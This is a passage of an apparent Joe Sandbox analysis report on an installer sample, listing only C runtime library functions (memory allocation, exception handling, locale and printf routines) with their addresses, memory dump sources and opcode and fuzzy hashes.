              • _free.LIBCMT ref: 00A11B2A
                • Part of subcall function 00A14452: HeapFree.KERNEL32(00000000,00000000,?,00A13C78,?,?,00A1101C), ref: 00A14468
                • Part of subcall function 00A14452: GetLastError.KERNEL32(?,?,00A13C78,?,?,00A1101C), ref: 00A1447A
              • _free.LIBCMT ref: 00A11B3C
              • _free.LIBCMT ref: 00A11B4E
              • _free.LIBCMT ref: 00A11B60
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: _free$ErrorFreeH_prologHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
              • String ID:
              • API String ID: 770894815-0
              • Opcode ID: 80a26a8d2363093972cd04a0d9fb4034e4faa29df2879acc2354ed1bfd24c883
              • Instruction ID: 5c71f1f31ca3e80a9255f2b504c5fb3ac53a68bfb5e31006968c7e1c5b0ff749
              • Opcode Fuzzy Hash: 80a26a8d2363093972cd04a0d9fb4034e4faa29df2879acc2354ed1bfd24c883
              • Instruction Fuzzy Hash: 2D015A326147119BEB34AF68D606BDBB3E8BF04724F10851EF166DB580DB78E9848A64
              APIs
              • __CxxThrowException@8.LIBCMT ref: 00A1155A
              • std::exception::exception.LIBCMT ref: 00A1157C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: Exception@8Throwstd::exception::exception
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 3728558374-1866435925
              • Opcode ID: cd2feca14d3cad1cfafe02fb5a5c652980e301da6fbc7e00445d5a360edfccd3
              • Instruction ID: 365ab887f634b22d4f2d06fa09ca05bb1be1634faea8555ebe233d2140bcb500
              • Opcode Fuzzy Hash: cd2feca14d3cad1cfafe02fb5a5c652980e301da6fbc7e00445d5a360edfccd3
              • Instruction Fuzzy Hash: 030175F2800218AFCB44EF6DC5066EE77F65B84724F548129EA169B101D674CB85CF51
              APIs
              • ___BuildCatchObject.LIBCMT ref: 00A17D53
                • Part of subcall function 00A17CAE: ___BuildCatchObjectHelper.LIBCMT ref: 00A17CE4
              • _UnwindNestedFrames.LIBCMT ref: 00A17D6A
              • ___FrameUnwindToState.LIBCMT ref: 00A17D78
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
              • String ID: csm$csm
              • API String ID: 2163707966-3733052814
              • Opcode ID: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
              • Instruction ID: edcf5e8224193b4b5adbd642b72a9d22d9cdba7efafecfe48fafea5ba5d84296
              • Opcode Fuzzy Hash: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
              • Instruction Fuzzy Hash: 5801EF31005109BBDF22AF51DD46EEE7F7AEF08360F145014BD1815162E7329AA1EFA1
              APIs
              • _malloc.LIBCMT ref: 00A1DE76
                • Part of subcall function 00A1729E: __FF_MSGBANNER.LIBCMT ref: 00A172B7
                • Part of subcall function 00A1729E: __NMSG_WRITE.LIBCMT ref: 00A172BE
                • Part of subcall function 00A1729E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00A163C9,00000000,00000001,00000000,?,00A1B742,00000018,00A2D728,0000000C,00A1B7D2), ref: 00A172E3
              • _free.LIBCMT ref: 00A1DE89
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: AllocateHeap_free_malloc
              • String ID:
              • API String ID: 1020059152-0
              • Opcode ID: 4c608b01514e0071d38e940802e2a564ddad9296ae4c6d7d36487b86e9448646
              • Instruction ID: e090880192b5dab0ce2c236b2ddebaba839e12470ba6a1ec75117f47057f2f80
              • Opcode Fuzzy Hash: 4c608b01514e0071d38e940802e2a564ddad9296ae4c6d7d36487b86e9448646
              • Instruction Fuzzy Hash: 9F113A32405615ABCF317FB4AD056DF37A6AF603B2F214026F85C8F190DF3088C18A90
              APIs
              • __getptd.LIBCMT ref: 00A1D9B1
                • Part of subcall function 00A1979C: __getptd_noexit.LIBCMT ref: 00A1979F
                • Part of subcall function 00A1979C: __amsg_exit.LIBCMT ref: 00A197AC
              • __getptd.LIBCMT ref: 00A1D9C8
              • __amsg_exit.LIBCMT ref: 00A1D9D6
              • __lock.LIBCMT ref: 00A1D9E6
              • __updatetlocinfoEx_nolock.LIBCMT ref: 00A1D9FA
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
              • String ID:
              • API String ID: 938513278-0
              • Opcode ID: c31671d7b8ab5cf4b3ff32a218a25dd3a18e9849595e2f29be748a7d037efe45
              • Instruction ID: 245e1e8f67288ccf04f7965fab7d80e18103d4c32e4580adf62763c4fefe885c
              • Opcode Fuzzy Hash: c31671d7b8ab5cf4b3ff32a218a25dd3a18e9849595e2f29be748a7d037efe45
              • Instruction Fuzzy Hash: E6F0B432D417109FDB20BB789A07BDE77A0AF04734F15461AF414AB5D2CB7448C1CA56
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3fa9e9f190880986999bb0c30447e4e8133f1d5f568fa7daba118a42f2ed1616
              • Instruction ID: a2ab8d05a0cb8214227cdb683b77eaf1a3f0fff95369cec6ac47cb43c89e3976
              • Opcode Fuzzy Hash: 3fa9e9f190880986999bb0c30447e4e8133f1d5f568fa7daba118a42f2ed1616
              • Instruction Fuzzy Hash: 4F516C75900609AFDF14DFA8C991AEEB7F9FF08314B20056EE152A7691E770EE94CB10
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
              • String ID:
              • API String ID: 2782032738-0
              • Opcode ID: 0a320d7ba5da11b76fa0d1a75b86a0988114d44a0565f6f8a54b3bdf28141451
              • Instruction ID: 7121c388420f1bef635b6b0b25177e44b3cc6e913200f414ceb194355390ceff
              • Opcode Fuzzy Hash: 0a320d7ba5da11b76fa0d1a75b86a0988114d44a0565f6f8a54b3bdf28141451
              • Instruction Fuzzy Hash: 3D417131E00A04DBDB249F79C9856DEBBB7AFC03A0F288529E46597180E770DED58B90
              APIs
              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A23C19
              • __isleadbyte_l.LIBCMT ref: 00A23C4C
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 00A23C7D
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 00A23CEB
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
              • String ID:
              • API String ID: 3058430110-0
              • Opcode ID: b11f730f29b781adf6f24cc17525a74c2e212c4c001ce25a0552c48685e2afcb
              • Instruction ID: 7d3eaf61ad4244038cc54a9dad4fca1e0d8743ed1516d1bdbfb7717d2732a603
              • Opcode Fuzzy Hash: b11f730f29b781adf6f24cc17525a74c2e212c4c001ce25a0552c48685e2afcb
              • Instruction Fuzzy Hash: 1331E532A042A5EFCF20DF6CD884ABA7BB1BF02310F1585B9E461AB191D734DE84DB50
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
              • String ID:
              • API String ID: 3016257755-0
              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
              • Instruction ID: a27f378ce91effd01da9952fa7d1104d1885bd21952d34444bb8f4f706539e76
              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
              • Instruction Fuzzy Hash: 4511667600018ABBCF625F84CC15CEE3F36BB58390B588515FA1859020C736C9F2EB82
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: _wprintf
              • String ID:
              • API String ID: 2738768116-0
              • Opcode ID: 740d22d58360f5726250e2c61c22d0522de7f4333f7273cb60cf7ebc13d2395a
              • Instruction ID: 7a871eaaf53c6c64e6fee7ca601a7f41d53d4870c6d60f3762544866e466888b
              • Opcode Fuzzy Hash: 740d22d58360f5726250e2c61c22d0522de7f4333f7273cb60cf7ebc13d2395a
              • Instruction Fuzzy Hash: 5BF0371394913139952C31AA354E9C7AF44FA16FF5F25142AF9ECE50D1594644C281D5
              APIs
              • std::_Xinvalid_argument.LIBCPMT ref: 00A135E2
                • Part of subcall function 00A138C4: std::exception::exception.LIBCMT ref: 00A138D9
                • Part of subcall function 00A138C4: __CxxThrowException@8.LIBCMT ref: 00A138EE
                • Part of subcall function 00A12276: std::_Xinvalid_argument.LIBCPMT ref: 00A12287
              • _memmove.LIBCMT ref: 00A1363D
              Strings
              • invalid string position, xrefs: 00A135DD
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: Xinvalid_argumentstd::_$Exception@8Throw_memmovestd::exception::exception
              • String ID: invalid string position
              • API String ID: 1253240057-1799206989
              • Opcode ID: 8d4ce161d46f96b603c51748e84a1240a8225dcc136a7a49ac94e95d464ebe07
              • Instruction ID: 87e450e3c7e2965ac1eaa4c886fcd70abe29278c427e0075fa7bd8f3ceea2fee
              • Opcode Fuzzy Hash: 8d4ce161d46f96b603c51748e84a1240a8225dcc136a7a49ac94e95d464ebe07
              • Instruction Fuzzy Hash: 9211C433304250BBCF249F0D9881AEBB7A9EB91760F10052EF9668B381CB71DAC18795
              APIs
              • std::_Xinvalid_argument.LIBCPMT ref: 00A1216E
                • Part of subcall function 00A138C4: std::exception::exception.LIBCMT ref: 00A138D9
                • Part of subcall function 00A138C4: __CxxThrowException@8.LIBCMT ref: 00A138EE
              • _memmove.LIBCMT ref: 00A121A7
              Strings
              • invalid string position, xrefs: 00A12169
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
              • String ID: invalid string position
              • API String ID: 22950630-1799206989
              • Opcode ID: ec8e38cc0de280e16c37f3b88ee8e6ef127f2552cc377a6e1a3593562aa6f3ff
              • Instruction ID: 78dfc69b9a585c15ff55933adcadc9e9dd51701efad4c239aecb33678d843ec8
              • Opcode Fuzzy Hash: ec8e38cc0de280e16c37f3b88ee8e6ef127f2552cc377a6e1a3593562aa6f3ff
              • Instruction Fuzzy Hash: 560175323006516BDB24DE6CDCC0AABB3B6EBC57507204E3DE6818B645DB70ECD587A4
              APIs
                • Part of subcall function 00A14895: __getptd.LIBCMT ref: 00A1489B
                • Part of subcall function 00A14895: __getptd.LIBCMT ref: 00A148AB
              • __getptd.LIBCMT ref: 00A17AC8
                • Part of subcall function 00A1979C: __getptd_noexit.LIBCMT ref: 00A1979F
                • Part of subcall function 00A1979C: __amsg_exit.LIBCMT ref: 00A197AC
              • __getptd.LIBCMT ref: 00A17AD6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: __getptd$__amsg_exit__getptd_noexit
              • String ID: csm
              • API String ID: 803148776-1018135373
              • Opcode ID: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
              • Instruction ID: 08a1270845a76586ddf74e637651ca72abf1499deb7875ee2eb10ac4a2008392
              • Opcode Fuzzy Hash: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
              • Instruction Fuzzy Hash: E501623980D205CFCF349F26C5486EDB3BAEF18321F24682DE042565A1CB309DC1CB11